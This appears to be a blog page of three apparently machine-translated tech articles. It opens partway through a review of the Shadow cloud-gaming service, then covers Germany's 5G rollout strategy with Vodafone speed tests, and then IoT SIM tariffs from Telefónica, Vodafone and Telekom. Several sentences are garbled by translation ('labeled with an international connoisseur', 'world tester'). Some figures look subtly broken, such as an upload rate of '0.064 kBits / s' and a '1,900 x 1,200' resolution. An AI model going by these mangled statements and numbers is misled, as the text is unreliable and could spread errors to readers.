Around 30 euros a month - that is 360 euros a year - for a rental computer sounds like a lot. Depending on how you calculate, but you get away cheaper than with a real PC. For a sample calculation, we take a relatively cheap high-end complete PC for 2,000 euros with Nvidia RTX 2070, Intel Core i7-8700, 16 GB of RAM and large SSD and hard disk space for comparison: the Acer Predator Orion 3000.

If you assume that you do not want to replace a component on this PC for five years, then the calculator will cost you around € 33 a month - and there the electricity costs have not yet been calculated. From six years without component exchange, the own gaming PC, however, would pay off.

Defects and Criticism

In our test, we use the somewhat unusual screen resolution of 1,900 x 1,200 pixels - it was not possible for Shadow to accept these settings. Neither within the app nor in the Windows settings or in the Nvidia control panel, the resolution could be adjusted. Thus, there were ugly black edges in our test. Also, multi-monitor setups are not yet supported, but this feature should be under development.

On privacy: Shadow promises that data is processed and analyzed only to a minimum. Nevertheless, we would not recommend storing personal information on a cloud machine. In particular, you should refrain from doing banking transactions or storing sensitive data.

In this sense, it is also incomprehensible how Shadow wants to proceed against violation of the Code of Conduct. For example, the use of the remote PC for crypto-training or illegal activities is prohibited. However, as the company refrains from monitoring the users, the company will only consult the user data on justified suspicion. How easily the company "buckles" to external pressure can not be estimated until such a case arises.

Alternative: Geforce Now

As an alternative to Shadow offers GeForce Now ( to the review ). This is currently in beta and offers a platform with preinstalled games. However, it is expensive to install "unknown" games, since so far only Steam, Uplay, the Blizzard app, Epic Game Launcher are supported. So EAs Origin, the Microsoft Store and GOG are missing from the big digital platforms. According to Nvidia, Geforce Now supports around 400 games.

Alternative: Liquid Sky

LiquidSky ( for the review ) follows the same principle as Shadow. At the moment the project is still in the beta phase with an activation on recommendation. The current offer offers two levels of performance: Power Serve and High Perfomance. Depending on your choice, your virtual machine will have 3- or 6-core processors and 2 or 4 GB of video memory. Depending on your booked model, credits will be deducted from your virtual credit. For example, one hour in gamer mode costs 60 credits (around 50 cents) and twice as much in pro mode with 120 credits (that is, 1 euro).

How Operators Should Expedite 5G Deployment

How Operators Should Expedite 5G Deployment

Major challenge in 5G roll out is altogether new infrastructure buildup and increase in base stations at a fast pace.One way of quick 5G deployment is collaboration of mobile operators at that level where infra share can be done.

2nd quick fix of slow 5G readiness is changing acquisition process of infrastructure. For that respective Ministry of the country or authority can be approached.

Here is a 5G Rapid Deployment Case Study:

Germany’s Ministry of Transport developed new strategy for mobile communications.
Faster approval processes, public land as sites for mobile sites, cooperation between providers: The Federal Ministry of Transport under Andreas Scheuer, also responsible for digital and infrastructure, promoted mobile communications with an overall strategy.

Federal Infrastructure Minister Andreas Scheuer (CSU) promoted the expansion of mobile communications in poorly served rural areas with further measures. Part of a new overall strategy, regulations for faster approval and expansion processes were deployed, as the ministry announced. As sites for transmitters public plots were to be provided.

Co-operations of suppliers with regard to expansion and acceptance by local residents was strengthened. The package is currently being developed and went into the vote in the federal government.

The focus was on eliminating remaining white spots, the ministry said. The strategy was beyond the previous requirements and commitments of the providers. Specifically, it is planned, among other things, to improve the mobile network in trains. For this purpose, 50 million euros have been earmarked for funding since autumn. In border regions, network operators will be able to activate additional stations of the LTE standard or maximize existing ones in terms of performance.

Some 17,000 federal government properties, 5,000 land owned by security agencies and 120,000 parcels of water and shipping administration were identified as areas for broadcasting sites – some already in June 2019 . There network operators were to be offered shorter approval procedures than elsewhere and favorable rental conditions, it was said.

Despite all investments, there were still areas with poor mobile and Internet coverage, especially in rural areas. The recent awarding of the frequencies for the new 5G standard had further requirements enshrined to make some white spots disappear. This includes that by the end of 2022, at least 98 percent of households in Germany will need to be provided with at least 100 MBit per second in the download.

Vodafone took that opportunity and able to expedite its 5G test to achieve higher results than expectations.

Vodafone Shows High Data Rates in the First 5G Mobile Station

In a first test at Vodafone in Berlin, the city’s first public 5G network measured 840 megabits per second in download and almost 36 megabits in upload. The frequencies are not assigned yet.

Vodafone 5G speed

Vodafone has opened the new 5G network at a first location in Berlin-Adlershof. As the network operator on 15 August 2019 informed shares , two other Berlin 5G stations are to follow shortly. Vodafone has also activated its first stations in Frankfurt, Solingen, Duisburg and Bremen. All in all, 40 stations are now broadcasting in the only public 5G mobile phone network in Germany to date. Ten more will follow later this month.

The base station in Berlin should be from Huawei, as Golem.de has learned from informed circles. Ericsson equips North Rhine-Westphalia and the West. But the newly auctioned 5G spectrum is not yet assigned. “We are using existing frequencies in the 3.5 GHz band that we have already acquired in the past and by allocating the new frequencies we will be able to further optimize the performance in the 5G network,” said Vodafone spokesman Tobias Krzossa Golem .de on request.

For the first 5G network of Deutsche Telekom in Berlin customers have no access, here special SIM cards are needed, which may be issued only to Telekom employees.

The Huawei Mate 20 X 5G has been available to Vodafone customers since launching in July on the 5G network. Similarly, the Gigacube 5G first customer already serves as a replacement for slow landline connections. Soon, Vodafone customers will be able to surf the 5G network with a second smartphone. The Samsung Galaxy S10 5G receives the required software update and then also works in the 5G network. Vodafone claims to have “a few thousand users” in the 5G tariffs offered for nearly four weeks .

Speedtest is promising

The daily Welt has tested the net with a Huawei Mate 20 X 5G. In a parking lot that allows a clear view of the antenna at a distance of just under 300 meters, 840 megabits per second are measured in the download and almost 36 megabits in the upload. At a speed test in a McDonald’s restaurant in Adlershof, about 500 meters from the antenna, editor Thomas Heuzeroth came to 280 MBit / s, before the door of the tester reached 400 MBit / s. “You should not go more than 1,000 meters, because that’s not enough,” explained Heuzeroth.

In Berlin Adlershof, the world tester should have had almost the entire capacity of the radio cell in the shared medium to itself.

Business Internet Of Things | IoT Applications 2019

Business Internet Of Things | IoT Applications 2019

Bringing things to the Internet is not an easy job and a lot of resource utilization put pressure on the MOBILE TARIFFS FOR THE IOT.

Wirelessly via wireless , smart devices are the easiest way to the Internet of Things . Mobile network providers have offers for companies as well as for private customers.

iot applications 2019

Dog trackers, company cars, surveillance cameras in the garden or on the remote company premises: If machines of any size are to communicate with each other or with central computers, network access is required. Especially with mobile devices or if there is no Internet connection nearby, wireless solutions come into play via mobile radio.Also, air quality outdoor stations often use cellular access to send the measured data to the evaluation server.

Case Study of European Mobile Operators Offering IOT services

European Mobile network operators Telefonica, Vodafone and Deutsche Telekom offer pure data access for this purpose – including a special feature: While still on national roaming with the coming portable radio standard 5G is discussed, free network choice with mobile radio accesses for machines is already reality for years.

National Roaming For The IoT

All three network operators of Europe make national roaming possible with a little trick: they use SIM cards from their foreign companies. For example, Telefónica uses a SIM card called Vivo-o2-Movistar with Spanish ID for local roaming in native country and global roaming. The country name of the Vodafone SIMs was not communicated to us by the Group. However, in writing, “IoT applications can access other networks worldwide in the event that there is no Vodafone network available, allowing for a dedicated global SIM card that is licensed and used exclusively for the Internet of Things . “

Similarly, it works for Telekom in the business IoT rates. The cards are called GlobalSIM here and are labeled “with an international connoisseur.” In addition, there are dedicated roaming agreements for this card with the other mobile service providers in Germany, ” writes the press office.

The pure data rates for IoT use are available to both home and business users. In doing so, the providers orientate themselves to the application. For example, Deutsche Telekom sees trackers of all kinds as a field of application for its SIMs for private customers. Similar to Vodafone: The residential customer product V-Sim is usually also included in tracking systems for dogs, cats, children or cars. But also mobile surveillance cameras Vodafone as a purpose on. Only O2 / Telefónica offers its pure data plan for private customers without an explicit deployment scenario and leaves the use to the customer.

Private IoT: Tracking, Watching, Driving

From the nature of the use, some providers also seem to derive the prices – such as Vodafone in the V-Sim. This offers the network operator individually and as a package of hardware and SIM card. Depending on the application and hardware, the packages are called V-Kids Watch, V-Camera, V-Pet Tracker or V-Auto. The private customer pays in addition to a one-time price for the hardware a monthly service fee, which is depending on the package and service between just under three and six euros. The pure V-Sim without coupled hardware and services costs around five euros; In addition, just under seven euros will be due monthly. Vodafone promises that the monthly fee will cover all data traffic across the EU.

At Telefónica / O2, private customers can access the o2 Go free ticket . Although the prepaid data tariff is without a basic charge, the traffic must be booked to customers. This can happen on a daily basis: For almost three euros, there are 500 MB per day. Who chooses the ten-day option for just under 20 euros, saves a third and can consume ten times 500 MB. Monthly it starts with the Surf Pack S with 300 MB for just under three euros. The XL pack with 10 GB of traffic is just under 35 euros.

A dedicated tariff for any IoT applications Telekom does not. In addition to its pure data rates, it also offers other specialized offers. As Car ConnectThe Group markets an IoT tariff for vehicles. Using an adapter plug not only telematics data are transmitted to the cloud, the plug also serves as a hotspot for up to five connected devices such as smartphones or tablets. They must divide the contained data volume of 5 GB for new customers and 10 GB, if the tariff is added to an existing contract. The adapter regularly costs just under forty euros, but is currently offered for one euro. If you want to track something other than your car, you can choose the Smart Connect S. The tariff called tracking flat costs about five euros and includes unlimited data volume with a download bandwidth of only 64 kbit / s. In the upload, there are only 0.064 kBits / s.

The business users have a completely different picture: Here, all three network providers offer great freedom and want to make their offers according to the customer’s request.

example of iot 2019

Business IoT: Not So Easy

Telefónica Deutschland offers its customers a tariff model designed especially for IoT applications. IoT Connect is used to connect machines and devices and to facilitate easy access to the Internet of Things and M2M applications. The tariff consists of a modular service catalog with two basic rates and numerous bookable additional services. The basic tariffs differ according to priority use in Germany or in Europe.

In a kind of kit, customers can choose between short and long term, flexible data packages and other options. Particularly interesting: The booked data packets per SIM can be combined in a common pool. This way different traffic requirements can be compensated. At the end of the very clear IoT tariff construction kit , Telefónica displays both the total price and the price per SIM used. For the management of the booked SIMs, there is a special platform called Kite that allows customers to manage their devices and facilitate integration with IoT Cloud.

For specific offers and prices, Telekom and Vodafone are rather cautious, in contrast to Telefónica. Upon request, Vodafone describes its tracking system Vodafone IoT Tracker for vehicles from cars to trucks, construction machinery and other moving objects. Part of it is a surface where the customer can track his tracked objects. The platform can book business customers from just under four euros per month per tracked object, the scope and cost of networking depending on the needs and wishes of customers. For all other applications such as machine control, remote monitoring or automation, the company can contact the network operator directly.

The same is true of Telekom: It points to the complexity of IoT applications. This starts with the question of whether the planned application should be used internally or sold as a product. Further aspects for the tailor-made IoT tariff are billing modalities, device activation, distribution and more. When asked, the press office announces, “It’s just not done on data tariffs alone – as a telecoms company, we have a self-service platform that allows our customers to meet all these different needs.”

Deutsche Telekom refers to its supply structure , which allows different tariffs depending on the business model. Nevertheless, starting in June of this year, a prepaid system will be sold as a simply bookable standard offer. In addition, the Group offers complete packages for selected uses such as tracking of goods and machine monitoring.

Alternative: Multi-SIM and additional cards

For both private and business users, a look at the terms and conditions of their mobile and fixed-line contracts can pay off. Because with so many additional SIM cards can be booked, which use the inclusive services of the contract with the same number as the main card. So you can bring his tablet or his smartwatch as well as IoT devices. The available data volume of the contract is mostly used by all cards together. But beware: The conditions for multi-SIMs differ depending on the mobile operators in part between the different contracts very strong.

Another way to bring trackers and other things online are additional SIM cards, as some fixed line providers offer them to their terminals. For example, at 1 & 1 some of its DSL connections have up to four free SIM cards throttled to 7.2 Mbps bandwidth and up to 100 MB of data per month. Only an activation fee applies to these cards. The term is linked to that of the main contract.

Oldschool: IoT control and feedback via SMS

New in all sorts of electronics, SIM cards are admittedly not. For a long time, for example, car heater can be controlled by remote control, which usually happened via SMS. The demand for such old technology is no longer strong according to Telekom, which is why SMS is no longer provided for IoT applications. Nevertheless, according to the press office, SIM cards from the company are multimode-capable and, in addition to the NB-IoT radio standard, they can always use 2G / 3G, which would still allow SMS.

Telefónica continues to see SMS as sometimes necessary – even for IoT applications. Accordingly, all Group IoT systems support the receipt of SMS: The Global Sim Vivo-o2-Movistar allows reception and transmission. Unlike Vodafone: Both the V-Sim for residential customers and Vodafone IoT Tracker for enterprise customers are pure IP-based data systems in which circuit-switched services such as sending / receiving SMS messages are not provided.

A look at IoT tariffs for both private and business customers shows that the Internet of Things is already a reality. With the expansion of 5G network operators expect a strong increase in networked devices. Telekom, for example, speaks of mass IoT and points out that today’s networks are technologically and economically insufficiently prepared for the onrush of machines. That’s why the company and its competitors are working hard to prepare the future networks and the services they need.

These 3 mobile operators deployed IOT Network Models are case studies of industrial level deployment of internet of things.

Everything on internet demands iot business ideas, iot business plan to avail opportunities.